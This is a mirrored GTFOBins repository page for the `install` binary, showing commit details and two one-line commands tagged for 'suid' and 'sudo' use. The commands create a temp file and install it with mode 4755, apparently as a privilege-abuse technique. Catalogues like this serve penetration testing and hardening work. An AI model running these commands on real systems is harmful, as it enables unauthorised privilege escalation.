1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-01-14 11:21:33 +01:00
GTFOBins.github.io/_gtfobins/install.md
2020-11-13 11:59:14 +01:00

196 B

functions
suid sudo
code
TF=$(mktemp) install -m 4755 $TF $TF -p
code
TF=$(mktemp) sudo install -m 4755 $TF $TF -p